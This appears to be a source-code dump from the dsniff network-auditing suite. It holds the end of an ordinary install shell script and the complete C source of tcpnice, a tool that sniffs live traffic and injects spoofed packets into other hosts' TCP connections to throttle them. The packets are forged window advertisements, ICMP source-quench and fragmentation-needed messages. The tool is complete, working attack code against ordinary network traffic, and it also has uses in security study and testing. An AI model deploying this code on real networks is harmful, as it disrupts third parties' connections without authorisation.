| -b=*) transformbasename=`echo $1 | sed 's/-b=//'` 79 | shift 80 | continue;; 81 | 82 | *) if [ x"$src" = x ] 83 | then 84 | src=$1 85 | else 86 | # this colon is to work around a 386BSD /bin/sh bug 87 | : 88 | dst=$1 89 | fi 90 | shift 91 | continue;; 92 | esac 93 | done 94 | 95 | if [ x"$src" = x ] 96 | then 97 | echo "install: no input file specified" 98 | exit 1 99 | else 100 | true 101 | fi 102 | 103 | if [ x"$dir_arg" != x ]; then 104 | dst=$src 105 | src="" 106 | 107 | if [ -d $dst ]; then 108 | instcmd=: 109 | else 110 | instcmd=mkdir 111 | fi 112 | else 113 | 114 | # Waiting for this to be detected by the "$instcmd $src $dsttmp" command 115 | # might cause directories to be created, which would be especially bad 116 | # if $src (and thus $dsttmp) contains '*'. 117 | 118 | if [ -f $src -o -d $src ] 119 | then 120 | true 121 | else 122 | echo "install: $src does not exist" 123 | exit 1 124 | fi 125 | 126 | if [ x"$dst" = x ] 127 | then 128 | echo "install: no destination specified" 129 | exit 1 130 | else 131 | true 132 | fi 133 | 134 | # If destination is a directory, append the input filename; if your system 135 | # does not like double slashes in filenames, you may need to add some logic 136 | 137 | if [ -d $dst ] 138 | then 139 | dst="$dst"/`basename $src` 140 | else 141 | true 142 | fi 143 | fi 144 | 145 | ## this sed command emulates the dirname command 146 | dstdir=`echo $dst | sed -e 's,[^/]*$,,;s,/$,,;s,^$,.,'` 147 | 148 | # Make sure that the destination directory exists. 149 | # this part is taken from Noah Friedman's mkinstalldirs script 150 | 151 | # Skip lots of stat calls in the usual case. 152 | if [ ! -d "$dstdir" ]; then 153 | defaultIFS=' 154 | ' 155 | IFS="${IFS-${defaultIFS}}" 156 | 157 | oIFS="${IFS}" 158 | # Some sh's can't handle IFS=/ for some reason. 159 | IFS='%' 160 | set - `echo ${dstdir} | sed -e 's@/@%@g' -e 's@^%@/@'` 161 | IFS="${oIFS}" 162 | 163 | pathcomp='' 164 | 165 | while [ $# -ne 0 ] ; do 166 | pathcomp="${pathcomp}${1}" 167 | shift 168 | 169 | if [ ! -d "${pathcomp}" ] ; 170 | then 171 | $mkdirprog "${pathcomp}" 172 | else 173 | true 174 | fi 175 | 176 | pathcomp="${pathcomp}/" 177 | done 178 | fi 179 | 180 | if [ x"$dir_arg" != x ] 181 | then 182 | $doit $instcmd $dst && 183 | 184 | if [ x"$chowncmd" != x ]; then $doit $chowncmd $dst; else true ; fi && 185 | if [ x"$chgrpcmd" != x ]; then $doit $chgrpcmd $dst; else true ; fi && 186 | if [ x"$stripcmd" != x ]; then $doit $stripcmd $dst; else true ; fi && 187 | if [ x"$chmodcmd" != x ]; then $doit $chmodcmd $dst; else true ; fi 188 | else 189 | 190 | # If we're going to rename the final executable, determine the name now. 191 | 192 | if [ x"$transformarg" = x ] 193 | then 194 | dstfile=`basename $dst` 195 | else 196 | dstfile=`basename $dst $transformbasename | 197 | sed $transformarg`$transformbasename 198 | fi 199 | 200 | # don't allow the sed command to completely eliminate the filename 201 | 202 | if [ x"$dstfile" = x ] 203 | then 204 | dstfile=`basename $dst` 205 | else 206 | true 207 | fi 208 | 209 | # Make a temp file name in the proper directory. 210 | 211 | dsttmp=$dstdir/#inst.$$# 212 | 213 | # Move or copy the file name to the temp name 214 | 215 | $doit $instcmd $src $dsttmp && 216 | 217 | trap "rm -f ${dsttmp}" 0 && 218 | 219 | # and set any options; do chmod last to preserve setuid bits 220 | 221 | # If any of these fail, we abort the whole thing. If we want to 222 | # ignore errors from any of these, just make sure not to ignore 223 | # errors from the above "$doit $instcmd $src $dsttmp" command. 224 | 225 | if [ x"$chowncmd" != x ]; then $doit $chowncmd $dsttmp; else true;fi && 226 | if [ x"$chgrpcmd" != x ]; then $doit $chgrpcmd $dsttmp; else true;fi && 227 | if [ x"$stripcmd" != x ]; then $doit $stripcmd $dsttmp; else true;fi && 228 | if [ x"$chmodcmd" != x ]; then $doit $chmodcmd $dsttmp; else true;fi && 229 | 230 | # Now rename the file to the real destination. 231 | 232 | $doit $rmcmd -f $dstdir/$dstfile && 233 | $doit $mvcmd $dsttmp $dstdir/$dstfile 234 | 235 | fi && 236 | 237 | 238 | exit 0 239 | -------------------------------------------------------------------------------- /tcpnice.c: -------------------------------------------------------------------------------- 1 | /* 2 | * tcpnice.c 3 | * 4 | * Slow down TCP connections already in progress. 5 | * 6 | * Copyright (c) 2000 Dug Song 7 | * 8 | * $Id: tcpnice.c,v 1.17 2001/03/17 07:41:51 dugsong Exp $ 9 | */ 10 | 11 | #include "config.h" 12 | 13 | #include 14 | 15 | #include 16 | #include 17 | #include 18 | #include 19 | #include 20 | #include 21 | #include 22 | 23 | #include "pcaputil.h" 24 | #include "version.h" 25 | 26 | #define MIN_WIN 1 /* XXX */ 27 | #define MIN_MTU 68 /* RFC 1191 */ 28 | 29 | static int Opt_icmp; 30 | static int Opt_pmtu; 31 | static int Opt_win; 32 | static int pcap_off; 33 | static u_char buf[BUFSIZ]; 34 | 35 | static void 36 | usage(void) 37 | { 38 | fprintf(stderr, "Version: " VERSION "\n" 39 | "Usage: tcpnice [-A] [-I] [-M] [-i interface] expression\n"); 40 | exit(1); 41 | } 42 | 43 | static void 44 | send_tcp_window_advertisement(int sock, struct libnet_ip_hdr *ip, 45 | struct libnet_tcp_hdr *tcp) 46 | { 47 | int len; 48 | 49 | ip->ip_hl = 5; 50 | ip->ip_len = htons(IP_H + TCP_H); 51 | ip->ip_id = libnet_get_prand(PRu16); 52 | memcpy(buf, (u_char *)ip, IP_H); 53 | 54 | tcp->th_off = 5; 55 | tcp->th_win = htons(MIN_WIN); 56 | memcpy(buf + IP_H, (u_char *)tcp, TCP_H); 57 | 58 | libnet_do_checksum(buf, IPPROTO_TCP, TCP_H); 59 | 60 | len = IP_H + TCP_H; 61 | 62 | if (libnet_write_ip(sock, buf, len) != len) 63 | warn("write"); 64 | 65 | fprintf(stderr, "%s:%d > %s:%d: . ack %lu win %d\n", 66 | libnet_host_lookup(ip->ip_src.s_addr, 0), ntohs(tcp->th_sport), 67 | libnet_host_lookup(ip->ip_dst.s_addr, 0), ntohs(tcp->th_dport), 68 | ntohl(tcp->th_ack), 1); 69 | } 70 | 71 | static void 72 | send_icmp_source_quench(int sock, struct libnet_ip_hdr *ip) 73 | { 74 | struct libnet_icmp_hdr *icmp; 75 | int len; 76 | 77 | len = (ip->ip_hl * 4) + 8; 78 | 79 | libnet_build_ip(ICMP_ECHO_H + len, 0, libnet_get_prand(PRu16), 80 | 0, 64, IPPROTO_ICMP, ip->ip_dst.s_addr, 81 | ip->ip_src.s_addr, NULL, 0, buf); 82 | 83 | icmp = (struct libnet_icmp_hdr *)(buf + IP_H); 84 | icmp->icmp_type = ICMP_SOURCEQUENCH; 85 | icmp->icmp_code = 0; 86 | memcpy((u_char *)icmp + ICMP_ECHO_H, (u_char *)ip, len); 87 | 88 | libnet_do_checksum(buf, IPPROTO_ICMP, ICMP_ECHO_H + len); 89 | 90 | len += (IP_H + ICMP_ECHO_H); 91 | 92 | if (libnet_write_ip(sock, buf, len) != len) 93 | warn("write"); 94 | 95 | fprintf(stderr, "%s > %s: icmp: source quench\n", 96 | libnet_host_lookup(ip->ip_dst.s_addr, 0), 97 | libnet_host_lookup(ip->ip_src.s_addr, 0)); 98 | } 99 | 100 | static void 101 | send_icmp_frag_needed(int sock, struct libnet_ip_hdr *ip) 102 | { 103 | struct libnet_icmp_hdr *icmp; 104 | int len; 105 | 106 | len = (ip->ip_hl * 4) + 8; 107 | 108 | libnet_build_ip(ICMP_MASK_H + len, 4, libnet_get_prand(PRu16), 109 | 0, 64, IPPROTO_ICMP, ip->ip_dst.s_addr, 110 | ip->ip_src.s_addr, NULL, 0, buf); 111 | 112 | icmp = (struct libnet_icmp_hdr *)(buf + IP_H); 113 | icmp->icmp_type = ICMP_UNREACH; 114 | icmp->icmp_code = ICMP_UNREACH_NEEDFRAG; 115 | icmp->hun.frag.pad = 0; 116 | icmp->hun.frag.mtu = htons(MIN_MTU); 117 | memcpy((u_char *)icmp + ICMP_MASK_H, (u_char *)ip, len); 118 | 119 | libnet_do_checksum(buf, IPPROTO_ICMP, ICMP_MASK_H + len); 120 | 121 | len += (IP_H + ICMP_MASK_H); 122 | 123 | if (libnet_write_ip(sock, buf, len) != len) 124 | warn("write"); 125 | 126 | fprintf(stderr, "%s > %s: icmp: ", 127 | libnet_host_lookup(ip->ip_dst.s_addr, 0), 128 | libnet_host_lookup(ip->ip_src.s_addr, 0)); 129 | fprintf(stderr, "%s unreachable - need to frag (mtu %d)\n", 130 | libnet_host_lookup(ip->ip_src.s_addr, 0), MIN_MTU); 131 | } 132 | 133 | static void 134 | tcp_nice_cb(u_char *user, const struct pcap_pkthdr *pcap, const u_char *pkt) 135 | { 136 | struct libnet_ip_hdr *ip; 137 | struct libnet_tcp_hdr *tcp; 138 | int *sock, len; 139 | 140 | sock = (int *)user; 141 | pkt += pcap_off; 142 | len = pcap->caplen - pcap_off; 143 | 144 | ip = (struct libnet_ip_hdr *)pkt; 145 | if (ip->ip_p != IPPROTO_TCP) 146 | return; 147 | 148 | tcp = (struct libnet_tcp_hdr *)(pkt + (ip->ip_hl << 2)); 149 | if (tcp->th_flags & (TH_SYN|TH_FIN|TH_RST)) 150 | return; 151 | 152 | if (ntohs(ip->ip_len) > (ip->ip_hl << 2) + (tcp->th_off << 2)) { 153 | if (Opt_icmp) 154 | send_icmp_source_quench(*sock, ip); 155 | if (Opt_win) 156 | send_tcp_window_advertisement(*sock, ip, tcp); 157 | if (Opt_pmtu) 158 | send_icmp_frag_needed(*sock, ip); 159 | } 160 | } 161 | 162 | int 163 | main(int argc, char *argv[]) 164 | { 165 | extern char *optarg; 166 | extern int optind; 167 | int c, sock; 168 | char *intf, *filter, ebuf[PCAP_ERRBUF_SIZE]; 169 | pcap_t *pd; 170 | 171 | intf = NULL; 172 | 173 | while ((c = getopt(argc, argv, "i:AIMh?V")) != -1) { 174 | switch (c) { 175 | case 'i': 176 | intf = optarg; 177 | break; 178 | case 'A': 179 | Opt_win = 1; 180 | break; 181 | case 'I': 182 | Opt_icmp = 1; 183 | break; 184 | case 'M': 185 | Opt_pmtu = 1; 186 | break; 187 | default: 188 | usage(); 189 | break; 190 | } 191 | } 192 | if (intf == NULL && (intf = pcap_lookupdev(ebuf)) == NULL) 193 | errx(1, "%s", ebuf); 194 | 195 | argc -= optind; 196 | argv += optind; 197 | 198 | if (argc == 0) 199 | usage(); 200 | 201 | if ((Opt_win | Opt_icmp | Opt_pmtu) == 0) 202 | Opt_win = Opt_icmp = Opt_pmtu = 1; 203 | 204 | filter = copy_argv(argv); 205 | 206 | if ((pd = pcap_init(intf, filter, 128)) == NULL) 207 | errx(1, "couldn't initialize sniffing"); 208 | 209 | if ((pcap_off = pcap_dloff(pd)) < 0) 210 | errx(1, "couldn't determine link layer offset"); 211 | 212 | if ((sock = libnet_open_raw_sock(IPPROTO_RAW)) == -1) 213 | errx(1, "couldn't initialize sending"); 214 | 215 | libnet_seed_prand(); 216 | 217 | warnx("listening on %s [%s]", intf, filter); 218 | 219 | pcap_loop(pd, -1, tcp_nice_cb, (u_char *)&sock); 220 | 221 | /* NOTREACHED */ 222 | 223 | exit(0); 224 | } 225 | --------------------------------------------------------------------------------